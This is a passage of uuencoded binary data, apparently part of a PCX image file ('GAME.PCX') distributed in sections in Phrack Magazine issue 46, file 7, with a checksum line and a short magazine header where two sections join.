MP<_!QCPXP?'!^<+_'QQX<<'X?\+XPO/!XQG"_\'PP?'!^,'`?G_!_GY\<`#!5 MP\'SP?_!S\'@`##!P\'QP<08P?_!X<'CP<\!P?C!_\'YP?QPP?YSP?O!Q\'CO MPI\8P?ACP>/"S\'_P?C">'_!_,)X<<'CP<`>$,'@P?!#P/L+_CPX>&,'SP_\?''YQP?Q_POC"\\'G'\+_P?QSP?B/GA_!WCY^.`_!^ MQ\'WP?^/P<8`.,'/P?/!S@S!_\'CP>>/`L'XP?_!^<'^><'^`\'_P<_!Q\(?; M&,'\9\''CP_!_\'\?GA_P?Q^/'W!QX>>'G/!\X>/?___W__._P8_/`&$'@?!$ MY\'_P<8/`!P\!\'/P?\.#'X\"'_"_,/G#Q_!_CXCP?'"SQ\.PCX\P?_!Q\'W( MP?^/P<8?P?S!S\'CP<0-P?_"YX_!Q#S!_\'YP?XYP?X#P?^/P?!M M_\'&#P8>/@?!S\'_!@Y^/@)_PO[#YP\?P?X>`X/"QP\.PS[!_P?!Q\'_CX8?Q MP?_!Q\'CP<6#P?_!Y\''C\'./\+_P?X[P?X'P?^/P.?C___X/_._P_"_[_"_X_!\\+_OX^_?@_!Q\'_= M@`S!_GX`?\'\/,+WP>>`'\'^`,'P`\'@!X0>/GP\','CA\'_AX8>.,''P?!QX_!_!_!^<'^.<'_, MP?S!_SS!_&>`#'_!\\'T#X___^#_SO^_QO_!\\'_P?W%_\'GP?_!X<'MPOP@X MP?_!^'C"\\'WP>!_P?X`P?`!P>`'P<##?'@@P?!#P?^!AC!PP>'!X\+AP?_!\ MX<'CCGPXP?_"^'G!_''!\<''P>._/SC!_\+CP<_!^#_!^<'^><'_P?C!_SC!` M_,'C@#C!_\'QP?@CP<___^#_U?_!\\?_P>?,_\'XPO_!\\'PP?_!\,'_P?#"F M_L+\0<'P8\'_P>!_P>#"\$/!\<'AP?_!\<'CP,'_P?AP>'#"\,'AP,'_P?C!_'C!_,'AP=O!^,'^P?'!_\'CP<__G M_^#_U?_!\]3_P?G#_\'QP?_!_,'_P?C"_\'^P?_!\<'X<\'_P?!_P>#!^,'P$ M?\'QP>'!_\'QP>/!_F!X?\'X<'APP?!AP>#!P\)^>,'XP?/!X\'OP?]_POAX1 MP?_!^,'\>,'XP>/!_\'XP?S!\<'_P?/![___X/_N_\'QU?_!\<+_P<#!_'_!( M_@!^`<'X`\'@`\'?/SP!P?/!X\'#P<`_P?QP>,'_P?S"<'C!X\''G'AQPO/!U MS___X/_N_\'SU?_!^<+_P<_!_W_!_P_!_P?!_P_!\`^?'QX#P>?!Q\'#@!_!2 M_@#!^<'_P?X`>!/!QX<>',+SP<./___@____Q?_!_G_/_X_"_\+/?\'_#\/_N M!\'^!\'GP<0?!\'\?`^//___W____\;_?\__P=_&_X_#_X_!_P_"YQ^'PO["_ M#S___]_____D_\'GQ?^_'___X/___^3_P>/&_S___^#____D_\'C___G____5 MY/_!]\;_?___X/_________-_________\W_________S?_________-____U sum -r/size 20457/59873 section (from "begin" to last encoded line) ==Phrack Magazine== Volume Five, Issue Forty-Six, File 7 of 28 **************************************************************************** BIG FUN (cont) section 2 of uuencode 4.13 of file GAME.PCX by R.E.M. M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_________-_________\W_____R M____S?_________-_________\W_________S?_________-_________\W_R M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_________-_________\W_____R M____S?_________-_________\W_________S?_________-_________\W_R M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_\W_P?S!\<'SP?_!^______Z_\W_P?QPP?#!^,'PP?G!^,'[5 M___)_\']___M_\W_P?S"0,L`0&!QPOO_____[/_._Q^.P@;"`L0``L(``@`"/ M!@<>#AX.'A^?O\'?P?_!W______A_]3_O\'_G\'_P=_%#PX&PP[#!@0&#L,&\ M!\(&#@<.!L'!\<'APOG___?_SO_!_ M\\3_P?'R_\'QQO#$8$#$8,'@P?#!X,;PP_'!^?__Z/_-_\'\<<'_P?G!_'?!\ M\/C_P?C#\,)P8'#+8,-PQ/#!^,+YP?C!^<+_P?W__]W_S?_!_&'!_\+X0X#^W M_\+[P?G!\,'[P?#!X,'PPF##0,D`0,(`0&#!P$!@<<'QP?#!^<'[___6_\W_B MP?[!\Y_"^`Q_P?\?___4_\*/Q`_##L0&Q03$!@[&#Q_"#\(?#\*?PO_!W_O_S?_!8 M_K=GP?\?___9_X_!W\./Q`_$!\(&!\(&!P8'Q`;#!P;#!\#!^<'PP?'"_\+]W__-_\'\PO_!X''!^\'S_____\+_P?G!\,'_P?')! M\,'@Q6#"0&!`Q&!PQO#"^=+_S?_!_,+_P>!PP?'_____T?_!_<'YP?W!^<'X) MPO#"<,'P<,9@<,1@PG#!\,'SSO_-_\'\P?\_P_!YAX/P?_"'SX/P?X/P>?!]\'''_3______\;_P<_!_:?!& MX<'\/#_!_\(?.`?!_`S!X\'SP<0_]/______QO_![\'YP?'!X,+\PO\?#WG!0 MY\'\?,+AP>?U_______'_\'YP?'!X,'\P?C!_\'^7H;!\<'SP?Y\P?'!X?;_V M_____\?_POC!X,'\P?A_P?S!]C!YP?'!_GS!\,'@P?#U_______'_\+YP>#!C M_,'X#\'\P<

<'SP?]\P>#!P<'`?_3______\;_P<_!_<'Y@'[!_!_!_@<8C M.\+_/D0#P<)_]/______QO^/P?W!_X`^PO_!_`<<.\'OP?\^#@^/?_3_____8 M_\;_C\'_AX\_P?^?P?X''A_!Q\'_/@8/C_7______\;_P=_!_`>?/L'\G\']P MP><^.8?!_S[![A./]?______Q__!^"?!_\']P?PCP?G!\<'^>"?!_WS!]SG!R MX/7______\?_P?S#_\'\P?/"^\'^P?A_P?_!_,'_P?G!X'_T_______6_\'X5 M]?_________-_______&_\'?___&_______&_X___\;______\;_P<___\;_\ M_____\;_P=___\;_________S?_________-_________\W_________S?__P M____QO_!W___QO______QO_!W___QO______QO_!S___QO______QO_!W___6 MQO_________-_________\W_________S?_________-_______&_\'?___&^ M_______&_Y___\;______\;_C___QO______QO_!W___QO_________-____) M_____\W_________S?_________-_______&_\'?___&_______&_X___\;_G M_____\;_G___QO______QO_!W___QO_________-_________\W_________H MS?______QO_!W___QO______QO^?___&_______&_Y___\;______\;_G___Y MQO______QO^?___&_________\W_________S?_________-_______&_\'?Q M___&_______&_Y___\;______\;_G___QO______QO^?___&_______&_Y__1 M_\;_________S?_________-_________\W______\;_P=___\;______\;_. MG___QO______QO^?___&_______&_Y___\;______\;_G___QO_________-A M_________\W_________S?______QO_!W___QO______QO^?___&_______&: M_Y___\;______\;_G___QO______QO^?___&_________\W_________S?__+ M_______-_______&_\'?___&_______&_Y___\;______\;_G___QO______" MQO^?___&_______&_Y___\;_________S?_________-_________\W_____] M_\;_P=___\;______\;_G___QO______QO^?___&_______&_Y___\;_____* M_\;_G___QO_________-_________\W_________S?______QO_!W___QO__\ M____QO^?___&_\[_P@\?G___\_^?___&_\[_#P?##\*/OY^____M_Y___\;_7 MS?_!_@;"!`##!,,`Q00&PP^/Q+___]__G___QO_-_\']P>'!\<'PQ6#,(&#"# MX,'QPOG#\<+_POW_____W?_;_\'YP?O!\#L(&`@##`@`"`,,"!A^?P=\?G^O_G___QO__< M_\S_P=_"_Y^_GQ\/#@;##L4&!\#"8$!@0,9@`,)@<,+@QO#!^<'PP?'!^_;____T_\'YP_C#\,1PS&#"Y M<&#$<,3PPOC!\,'XP?GP_______#_\/[P?_!^\/YP?O!^,'P<,'@PF!``$#*- M`,)`PV#!\,/YY/______T/_"WY["'P[#!@(&S0(&PP\?G\+_P=_;_______?> M_\.?'\0/#LH&R0\?G\_______^;_CY_%#\8'!L@'#Q_._______S_\./!\(&: MP@3"``_._______Y_\']P?G!X<'PS__________-_________\W_________\ MS?_________-_________\W_________S?_________-_________\W_SO_#: M\/_____[_\[_P?!@<'______^O_._\'@P?#!X$?_____^O_._\'/PM^'____Q M__K_SO_!S\+_P>______^O_._\'/PO_!Y______Z_\[_P<_"_\'G______K_Q MSO_![\+_P>?_____^O_._\'OPO_!X______Z_]'_P?/$_\']______7_SO_!6 M[\+_P>?$_\'\?______T_\[_P<_"_\'GPO_!S\'ZP?X#P?[!_Q_!_\'WP?\&& M'XX/P?_!_@_!_Q______Y?_._\'/PO_![\+_P<_!]L'\!\+_'\'_P'#___V M___4_\[_P<_"_\'GPO_"X\'#P?PXP?\?P?^#P?X?P@\?P?_!P8'!\`0^'\'AP MP>#!_X?!_#_!P\'^/@`?@`>`!\S_P>______Q__._\'OPO_!Y\+_P?#"X\'\V M>,'_O\'_P>#!_#_!YP_"_\'CP?C!X<'\/`_!X<'@P?^'P?`_P>#!_SQ]CX#!+ M_\'`P>'!_\'QRO_!X\+_P>?_____Q/_._\'OPO_!Y\+_P?#"X\'\<,/_P<#!_ M_'_!X\/_P'_!Y\''P?_!P\'QP?_!H M\?1_\'S___Q_]'_P??"_\'X;\'OP?YXP__!\,'\?\'CQ?_!) MX\'_?"_!X,'P?B?!\#_!X'QX?\'GPO_![\'PP?_!\,'XPO_!^,'_P?O%_\'GE MT__!\\+_P??$_\'WP?_!_,'YQ/_!^___X?_._\'OPO_!Y\+_P?@/P<_!_SC!( M_W_!_YC!_C_!SPO"_Y_!_\'#P?\<#\'!P?!^!\'P#\'@?#Q_P>>/P?_!S\'P= MP?_!X,'X?\'_P>!_P>'!_<'XP?O"_\''R_\?Q__!P\+_P!P>`>!\'SC\'"PAY_P>>/P?_!S\'\P?_!P,'X!\'_@!\`P?S"``?!QX?!I M_\'/DC\'P?X'P?X/P?X?#\'_P=_%_\'/P?_"C\3_'\'_P?YYQ/_!]___X?_.U M_\'/PO_![\+_P?X?C\'_&<'_'\'_'CX$#P`/P?\/P?_!S\'_#@>!P>(>!\'WD M#\'''CX_P>>''X_!_,'_P'!\'_CP`_!\'\!\'^#\',% M'P^?C\'_C\+_/X_!_\*/Q/\?P?_!_F_1_\'/___4_\[_P<_"_\'GP_\?C\'_8 M'\'_'\'_#C[##Q_!_P_!_\''P?\.!PO!YQY'P<>/P<>/'C_!QX8/P<_!_L'_O MP??"Y\'_AX\>/C]KP>_!QX?!_X\'#PY^#G\'P<?#_S_!S\'_.,'_/\'^3 M`#[##\+_'\'_P_"_\'GP_\_P>/!_#C!_C_!_``\X M/\'/O\+_C\'\P>/!_PQP.<'AB,'CP<`#P>/!X#Q_P>.'P?_!S\'XP?_!\<'G= MP?'!_\'GP>`@,,/YP>/!Y\'_P<._/#W!^,'\8<'QP'!] MX\'#P?_!P\'`AX`_P?P/`'AQP>`/PGS!\\'@?\'@PO_!X<__?\'_PC_$_\'QC MRO\_P?_!_G_-_\'QYO_1_\'WPO_!_G_!X\'X>,'^?\'X8#Q_P>_#_\'7P?C!I MX\'_/'!YP?'!P,'CP<`#P>/!X#A_P>/!W\'_P/!\\''P?_!Y\'!1 MP>>P?\'\/G!XP?'!X,''PGS!\\'`/\'@?\'^8,'XP>S!X\+PPO?!\,'_P?/#P M_\'XP?Y_P?_"?\3_P?'*_W_!_,'^S?_!Y\'AP>?"_\'^P?_!^>#_SO_!\,'Y9 MP?_!]\+_P?Y_PO#!^'A_P?A_?'_!Y\/_P>/!^,'QP?Q\<'C!\<'@P>/!X''!` MX\'P/'_!X\+_P>?!^,'_P?'!Y\'YPO_!X'#!^,'YP?C!^<'CPO_!X\'_P?Y@M MP?C!_L)@P__!^,'^>,'XP?_!Y\'QP>_!_\'WP>?!YG_"_SQ^>''"X<)XP?'![ MX,'WP>`_P?XPP?AX<,'P8&'!X\'@?\'@P?AWP?_!\'@_P?P^<,'^P?/!_\'XK MP?'!^'Y[P?#"_\'WP?S!_\'X?\'\?\W_P?/!X/!L M\#Q_P<>/P?_!Q\'PP?_!\\'GP?'!_\'/P<1_P?C#^<'CP<_!_\'#/Q_!P'C!Y M_F`!P<_!_\'?&,'^.<'XP?_!S\'SP<_!_\+'P>8?/\'_'G\8<<''P>'".,'SM MP!`0<'CP<`^`,'P!\'_P>`8#\'\#P!^`<'_P?@!P?`<< M`\'@P?_!_@/!\'_!X#_!^'_!_\'[S/_!P\/_P?Q_P?##_Y_<_\[_P/!P\'GC\'SP* M#X_!_\''P=/!_\'SP>?!\\'_P/"','SPH\?$ MG\'^/SA\P?S!X\'AP?/!QX_"'G"'P?_!QPX?P?\/!CX#P?_!\`/!X@8'@C_![ M_@/!P`\`'\'\'GX"!\'^'\'_P?(_CW^/P?\?P?_!Q\/_P?Y_P?K#_Y_<_\__5 MP@\?P_\_P?\/P?\'P_^//\'/``_!_\'N!\'^`GX\?\'GP/'S_#_\''C\'_P<\?#\'^/'XGP?^/P<\/'G\?3 MP?W!_X_!]X_!_\*/P<8&'\'_'G\>>X_!XPP?P/'CXSPO_!SX\?P?\?#SP-P?_!XP?!QX?"#Q_!_@F'#PP?P?P>?``'P?0/D MP?_!Q!\&'P?!_@_!SP?!S\''P?\.?\'_C\+_']S_U_^?P?_!S\/_P=_!_\'/- MCP_"_P_!_P?$_\'GP>^?P?_!Q\'_/@&#\'_P??!YP_!_XP?P&9\'GP>_!QX?!_@XW'\+_CQ_!_\,?P?]_P/CG!_<'_PL>/P?_"C\''/\+_'C\<<8_!XX`#P>>/CA^?P?Y_[ M','P`,'GP?/!\<'G@+P$-`_"_P\_P?_"/SC!_'_!Q\'CP?^''P\?P?_!^8>.* MPC_!_C[">,'YP>?!Q\'_C\(/'AQX`\''A\''!#X`?\'\`\'T#Q\`P?_!Y\'OT MV/_T_\']P?_!_<+_P?G!_,+_P>#!_\'APOW#_\'CP?_!Y\+_`,'X`,'X`\'@Q M+\'''B#"^<'_P>'!X\'OP?_!Y\''P>>_PO\_/CAQP>?!X<+!P?/!S\'F/Y_!/ M_G\XP?#!\<'APO'!X\'P.`!X`\'_P>`'?\'_/W\P('_!Y\'QP?`#O``_P?[!W MX,'GP>Q_/\'\?'C"^,'AP>/!_\'#P?X_B'AQP?'"X\'B/SAX?\'P<,'@P>.<( M,'G!X<'CV/_]_\'CQ__!\\3_P>#!^&'!^&/!\'_!X\'^P>#"^<'_P?!'P>_!? M_\/GP?!_P?]_?'C!\<'AP>/"P<'SP<_!YL'_P=_!_GYXP?#!^\/QP>/!_#C!F M\,']P>'!_\'@!G_!_\)_<$#!_\'CP?'!\$/!_`!_P?@`P>?!Y,'_?\'\PGC"@ M^,'@P>'!_\'@P?Y_P/!Y\'B?L+X?\'PP?C!X<'CP?S">,'AP>/8U M____R__!^<'XP?O"_\'XP__!\<+YP?_!\'_"_\'SP?_!]\'@?\'_?\'P>''!B M\,'GP>'!X\'SP>_!Y\'^O\'^?'C!\,'XP_'!X\'_P?C!_\'[P?'!_\'@P>9_# MP?_"?W#!\<'_P>/!\<'@P>/!_##!_\'X<,'GP>S!_W_!_'QXPOC!X&'!_\'P[ M?G_!X'!SP?_!X\'GP>+",,'\?\+XP>'!\<'X?GC!X-G__?_!S\W_P?C+_\'\^ MP__!]\+_P>##_\'`P?C!\<'P!\+#P?/!S\''@!_!_CAXPOC!X\+QP>.?G,'^S MP?/!\<'_AXY_P?\_?S#"_\'CP?'"P\'^/\'_POC![\',?S_!_'QYPOC!P'/!' M_\'P/C^``&/!_\'#P<_!Q@`0P?Q_P?C!_$#!XYA^.,'@P<_8__W_P=_-_\'^D MUO_!W\+_P?X?P/PAYSP?/!_X\/'\'_= M'S\?QX`P<_8____Y_\_P__"WX8?P?X'P?_!_@?!E M[\+_P<>.'@Q_!\'_A@\?P?\?/SP?P?_!QX>/!\(/'\']:<*//C_!_CY_POW!< MS\+_P=\/'XP_P>?!_\+/C@\=P?Y_P?_!_@(/'G\>!0_8____[?_"G\'_'\+_G MC\/_P>_!SS\'P?\/P?_!Q@/AC_!_@M M?\+_P<>'P?^/P@\.'R?"Q\'/CQ^?P?Y_P?_!_@>?#G\>#@_8____[?^?'\'^% M/]'_P=_"_X_!_\'^'\'_/\'?P>3!_\'^#\'_P<^`/\'_'GW"_<'P!\'_P<8/" M!!X`>`/!Q\+/#QQ\?\+\1\'WGCX>#A_8____[?^`?\'^?];_P?W$_\'YQ?_!7 MX<+_P?[#^<'P+\'_P>`^`'X`P?@#P>/!Y\'O@#AP?\+PP>'!X[S"?!P_V/__I M_^W_P>#K_\'\PO_!\,'^,,'_P?'!^'?!]\+_P>#!_D#!_\'P8,'PP>/!_L'`, M?L)\V/___^W_P?#O_\'^?<+_P?S$_\'PP?[!\,'_P?AAP?!_P?[!X,'^PGQ_8 MU_______WO_!_G_0_\'SV__._\/?_____\W_P?X?[/_-_\'NQ@;##L8/PO^?# M___^_S_L_\W_P>\/!\@&!\(&P@?%#\2/O______E_]3_GX\_P?_"CQ\/C,($$ M`,,$``3%`,($!L($Q08'#Y^/G[_!_[_!_[______SO_<_\'YP?'!X<'@P>'!> MX,)@P>!@T2!@(&'!X,)@<!@P>#)8,+@R/#!\<'S___W__3_P?G#^,'PP?C!\,'XQ/!PP?#%% M<,9@<,)@PG#!\'#"\,'XP?G!^___\O_-_\'X^O_!^\/YP?'!^,+P8,-`Q0#"! M0&#"0,-@<,'QP_O__^7_S?_!_A^?___!W\*?'Q[&`@#'`L(&#@_!W___Y/_-E M_\'^#@_!QC_!_\'/#X8^'___PO_!WY_!_\*?PA_"#\,.Q08.QP\?/Y___];_Z MSO\'#\''9\'_P#!_,'OP?#!X<'L>\'_P>/__]S_P?G!\<'XPN#"(`##" M(,<`(,(`PB#"`,(@8"#"8,'PP?'!^<+]]/_-_\'PP>!@P>#!\,'@P>9WP<'!V M\/__Y?_"^#!\,'@P?#"8,'@8,'@8,)`8$#&8,+@Q/#!^<']Y__-< M_\'P?&#!X'#!X,'^<\'@P?#__^O_P?O!^,'ZP?C!^<3XPO#!^,7PPW#*8,-P- MQ?#"^,+YW__-_\'PP?QXP>/!\$#![\'AP<#!^!______PO_$^\'XP?#"^,+P- M<,D`PD!@P>#!\,'YP?'!^\'_P?O4_\W_P?O!_C[!S\'V"<'/P<./P?\/___M? M_[_9_\'?PO_"WPX&#@;$`L,`PP(&`@8/PA\/'Y_!W\__S_\^P<_!_P_!SW^?B MP>^/___M_[_F_Y_$#\0.QP8/SO_/_S_!S\'G#\'/%X_!SX___^W_O\/_P<_C8 M_Y_"_Y_$C\0/P@<&#\[_T/_!P#^?P!P/___[O_!X#_!Y\'@P?!OP?_!_G[!X#_!X#W!] M[\'_P>'U_]#_P?O$_\'PP?C__^__P>/"Q\'PP?'!_\'\?GS!\,'_P?!PPN/!S MP/7______\?_P??"Y\'SP?'!_\'\PGS!\<'_P?C!\,+CP?#U_______'_\+GD MD\'SP?'!_\'\PA[!\\'GP?S!^,+#O_7______\;_/\'OP<<7P??!\C_!_!X.F MP??!Q\'^P?O!QX_!QQ_!_\'X'\'_C@9OP>?!_L'_P<,'S M#_7______\;_O\'OAP?"]Q_!_PX&9\''PO^'P@?U_______&_[_!YX8!P??!T M\\'_P?`.<&?!Y\'^P?F,!Q_U_______'_\'@#'G!\\'QP?_!\<'F>,'QP>?!F M_,'YP>ASO_7______\?_P>!XP?G!\\'PP?_!\<'D>,'PP?_!_,'PP?AS]O__$ M____Q__!\,/_P?C!_\'SP?;!_,'P?\'\P?G!_,'SP>#U_______'_\'[R/_!U M^,+_P?O!_L'_P<#U_______&_[___\;______\;_O___QO_________-____Q M_____\W_________S?_________-_________\W_________S?_________-R M_________\W______\;_O___QO_________-_________\W_________S?__[ M_______-_________\W______\;_O___QO______QO\____&_______&_[__; M_\;______\;_?___QO_________-_________\W_________S?_________-= M_________\W______\;_?___QO______QO\____&_______&_W___\;_____2 M_\;_?___QO_________-_______%_\'^?___QO______QO]____&_______&G M_S___\;______\;_/___QO______QO]____&_______&_S___\;______\;_P M?___QO_________-_______%_\'^___'_______&_W___\;______\;_?___W MQO______QO\____&_______&_S___\;______\;_?___QO______Q?_!_G__W M_\;_________S?______Q?_!_G___\;______\7_P?Y____&_______&_W__L M_\;______\;_?___QO______QO]____&_______&_W___\;______\;_?___P MQO______Q?_!_O__Q_______Q?_!_G___\;______\;_?___QO______QO]_L M___&_______&_S___\;______\;_/___QO______QO]____&_______&_W__0 M_\;______\7_P?[__\?______\7_P?Y____&_______%_\'^?___QO______/ MQ?_!_G___\;______\;_?___QO______QO]____&_______&_W___\;_____S M_\7_P?Y_V__!_>G______\7_P?Y_V__!_>G______\7_P?Y_V__!_>G_____D M_\7_P?Y____&_______%_\'^?___QO______QO]____&_______&_S___\;_R M_____\7_P?Y____&_______&_W___\;______\7_P?[__\?______\7_P?Y_B M___&_______%_\'^?___QO______QO]____&_______&_W___\;_S?_!QP?&V M#Y_"C[___^S_?___QO_-_\'$!,(`Q`3"!@?"#Q^OP?^____G_W___\;_SO_!O M^<'QP?##X,)@P>#,(&`@8,+APO'!^?__V?_!_G___\;_S__!^\+_P?G!_\'XF MP?'%\,+@PV#!X,E@P>#'\,'YPO/__\__P?[__\?_W?_!_<3_P_C'\,)PP?!P& M8,-P8,5PPO!PPO##^,'PP?G!\,'XP_GZ_\'^___'_^W_P?O!\<'P0,'P8,'@Q MPT``0,(`0,(`PD``PD!@PD#"8,+PP?G!^\'XP?K!^<'[___[__G_P=^?PM^?T MPA\.Q0;-`L,&#L(?PY_"W\'_G\'?X_]____&____Q/^_P?\?G\,/'\_[_#_[^^!L,$P<3$!`8'P@_"O\+_O\[_P?Y____&____I MY__"_<'YP?W!X,H@PF#!_,'XP?#!^<'[Y?__B M____TO_!W\/_PM^?#L(&Q@(>P@+"!@\?GQ_!WY_?_______?_[_#G\0/P@;"0 M#L(&P@X&QP\?CP\?T?______Y?^?PH_&#\('!L('P@;%!\,//\[_______+_O MPK^?P@_"!L($P@`_SO______]?_#_<+YP?#"X,__________S?_________-. M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_]3_P?Y_______;_U/_!]G______]O_4_\'@/]'_P??_____] MY/_4_\'@?\'YS__!\\'[R/_!^=#_P?W!_\'Y_____\C_U/_!X'_!X,'\PO_!F M\'_!\<'PP?_!\,']PO_!^<+_P?')_\'QR/_!_,?_P?S!_\'YQO_!\'!\'_!X,'X<<'QP?!^<<'PP?O!^,'_P?C#7 M_\'^P?_!\,C_P?C&_\+\P?_!^<;_P?'!\\'_PO/$_\'\___W_]3_P>,_P'!QX/!P`\0<$'!\<'@#`#!P,'SP?`?@'_!^`'!^`/!X,'_P?@/P?_!@ M\'_!X,'_P>!_PO^/PO_!_'S)_\'CP?_"X\/_/\'^QO_!\\S_P?O!_\'S___A+ M_]3_CQ^?#S[!_X_!QX\/CSX]P?O!\\'_'L'\P=/!\\''CP8?P?X0P?`#P<#!` M_\'X!\'_@A^&/``;PO\'@C_!_!X#P?_!^A_!_P?#_\'#P?_!P\'"'\'^'A_"% M_\'?Q/_!Y\[_P>?$_\'?G\C_O___TO_4_X\?GP\_P?^/P>>/P@_!_C_!_\'G? MP?\?P?S!Y\'SPH\/'\'^''.'P>/"_X?!_X!\'_P>P/B MP?\'PO_![X?!_X/!P@_!_AX?PO\?P?_!S\+_P>?._\''Q/^?'\C_/___TO_4< M_X>/#X^&'\'_P??!_Q^.P??!YX_!Q\(?P?Y^!\'^P??"_\''[ MP?_"CY\>/G_"_X\/'\'^'@Y_P>>/P?\.PO?!YX?!_X?!P@?!QPX/P?X^!\'_! M!W_!_\''#X8?AW^'P?\/P?\?P<_!_Q_!_\''Q/^?'\;_P<'GC\'^/,+SP>.'P?^#P<`'P<<.'\'^?`?!N M_P0]P?S!X`>`'X!_`<'^!\'\'X?!_P/!_X?$_Y\?P__!_<+_P>?!_[_&_\'CF MQ/_!_`XPOC!\\'_P=\_P>_!_'S!& M_'G!X<'_P?P_PO'!X<'CP?_!X<'CP?/!_\''/\'\><'QP?\\>,'XP>'!X\'!B MP>>D/#AP(<'@AP#!^"'!_\'!P?!_P>'!_@>`P?_!X<'_P?#"_\'GR/_!X\3_M MP?C'_\'SPN?%_\'^/\+_P?/!]\;_P?OI_]3_P?#!P\+_P<'"_\'CP=]_P<1P% M<<'YPO'!^&#"\<'?P>?"_\+XP>/!_,'QP?_!\&'"_\'CP>`XPOC!\\'_P=Y__ MP>_#_,'QP?#!_\'\<\/QP>/!_\'APO/!_\'&?\'\<,'SP?X^PO#!\<'AP/&_\'SZ?_3_\'^?\'CPO_!9 MX<'_P>?!X<+_P>!\<<'XPO'"^,+QP?_!]G_!_\'XP?QSP?C!\<'_P?#!\<+_\ MP>-P>,'XP?QGP?_!_G_!_\'\?,'\>,'P?\'^8,/QP?/!_\'AP?/!\<'P`G_!X M_'A_P?]QP?C!\,+QP>?!\G_!_'APP?G!_\'@?'C!\,'_P?/!X<'WP>'!_K;!` MX'QPP?_!\'AAP>/![\'^<,'\8'_!^'_!X,'_P?#!_\'^<,'XP?_!\,'_P?#!1 M_\'SP?_!X\;_P?Y_PO_!\<'SQO_!\\7_P?WC_]/_P?X_P<,_P=_!P\'_P>/!E MQY\/A'PQP?G!\<'CP?C!\,+SP<_!YS^?P?C!_'/!^,'QP?_!X<'CP?_!W\''M M&#C!^,'^9\'_P=X_P<_!_'S!_'G!^`_!_\'`P?/!\<'AP>/!_\+CP?/!\`\_+ MP?QX?\'_`<'XP?#!\\'QP<_!YG^<>#'!^<'_P'P?^?L M"#PXP?_!\'AAP>./'@!\`'_!^`?!P<'_P>!_P?P`P?@?P#!_\'#P?_!4 MP\'_P?'!_\'[P?_!^\'^.\+_P?/!X\+_P<_#_\'[Q?_!_>/_T__!_C_!Q\*?V MP<_!_\'B#Y^"#@`;P?G!\X,<`'/!\\''C\(?P?Y^<\'XP?/!_\'GP<'_P/!Y\'_P>?!Q\'SP<,//\'^/ M?P?!_\'`.,'\P??!^X_!YG^,`!O!_<'^!@(3P?O!_\'/C\''G\'_PI\>/C_!U M^<'_P?C!YA_#'CQ_P>/"Q\'_CQ_!_`#!XP>"#P8>`L'GPH>`/`/!_\'P'@!_K M`\'SP?!^X_!QG\,!C_!_\'L0 M!@0/PO_!SP_!QY_!_\(?PAX_P?W!_\'YP>8?PA["/G_"Y\''P?^/'\']"<'G4 MPH?"#QX.P>?"APX\!\'_P<8.!#\'P>?!S\'_A`^/?P_"_P_"_\'/P?Y_XO_8* M_\'/Q?\/C[_"_X_"#S_"_Q_"G\+_P?X'P?[!_\'F!\'_AP\.#\'^?P_!_X\/, M'\'_/GY_P<>'P?\^-\'CPN?!_\'GP/P<<_2 MCC_"_X>&#[_"_\''#\''G\'_PA\.!C_"_P)B/Q\_'L'^/\''P?_!Q\+_#\'W) MP?_"Q\*/'PX?P>?!QX#F/!Q\'_AP^&'@?!Y\'&!X8/AVX?N M!\+_#\'//X_"_Y_#_[_!_\'/TO_8_X_%_P_&_Y_"_\'^/\'_O\+_P?X'P?S!B M_\'P!\'_@!\`','^?Q_!_\*/'\'^/,'^><'GA\'^/#/!P\+GP?_"Y\'SCP\_- MP?X_P?G!_S\9P?S!Y\'CC\'F/QQ_P?O!_8>&/\'[P?/!_\'G#\'GG\'_GQ\&/QS!Z M_,'_P/&/!Q\'_CP\.'@'!X\'`!X`/`#`>!\'_P?0/@#^'P?_!_@_!^ M[\'_P<["/X?2_]C_/\3_P>V_T__!_<+_P>G!_\'SP_^_P?_!Y\'@?\'_/,'\5 MP?G!\"_!_`#!\`'!\<'AP?_!X<'CP?'!P`,_P?YXP>'!_R`XP?#!X<'CP9_PO'!_\'CP<_!Y[_!_Y^_O,']P?_!^<'X(,'@/SQ_.,'\P M?\'CP?'!X\'_P>`_P?'!^,'@`9_!YG_!S`/!\\'GP<9_N,'\P?_!X,'^/[_!0 M^''!X\'_/\'./[AYP?'!X<'CP<&/O'A\<,'_P>'!PX`_(,'_P?@#P>!_P>``G M/X!\`P#/_]?_P?Y_Q/_!X-?_P?O!_\'[Q?_!]\'PPO_!_<'\P?G!\'_!_D#!D M\&'!\\'AP?_!\<+SP>!C?\'\>,'AP?]@>,+PP>/!P<''P?!\<''!\<'AP?#_[^XPO_!\,'X<,'@P?^\?CC!_'_!X\'QP>/!_\'@/\'QB MP?C!X&'!W\'@?\'.P>'!\\'GP>9_POC!_\'PP?Y_P?_!\''!X\'_?\'.?L'XO M?<'QP>/!\\''P<_!_'C!^,'PP?_!X<'CP!X@ M`$#/_]W_P?#<_\'^?\O_P?O!_<+_P?G!_\'YPO_!\,+_P?[!^'/!_\'PP?QP( MP?!WP>!_P>#!_\'@POG!\&!P>,'@P?_!\\'@P??$_\+\P?_#^,'CP?_"?#C!1 M^'_!X\'QP?/!_\'Q?\'QP?C!X,+_P>9_P?_!\,'QP>?!Y'_"^,'_P?A^?\'\7 M8''!X\'_?\'L('QQP?'!Y\'SP?_![\'X>,+XP?_!X\'QP>_!_'A_P_'!_\'AA MP>?!]L)\PGC/_]W_P?#7_\'?Q/_!_G_8_\'^PO_!\<'^4<'P?\'`?\'@P?_!T MP,'[P?G!X$,`P?@!P?_!Y\'@#Y_!_Y\_/'A_POC!\,'GP<\>?CC!^'_!X\'QS MP>?!_\(?P?'!^,'CP?^?P?!QG^8P?C!_\'X1C\\`''!X\'_9 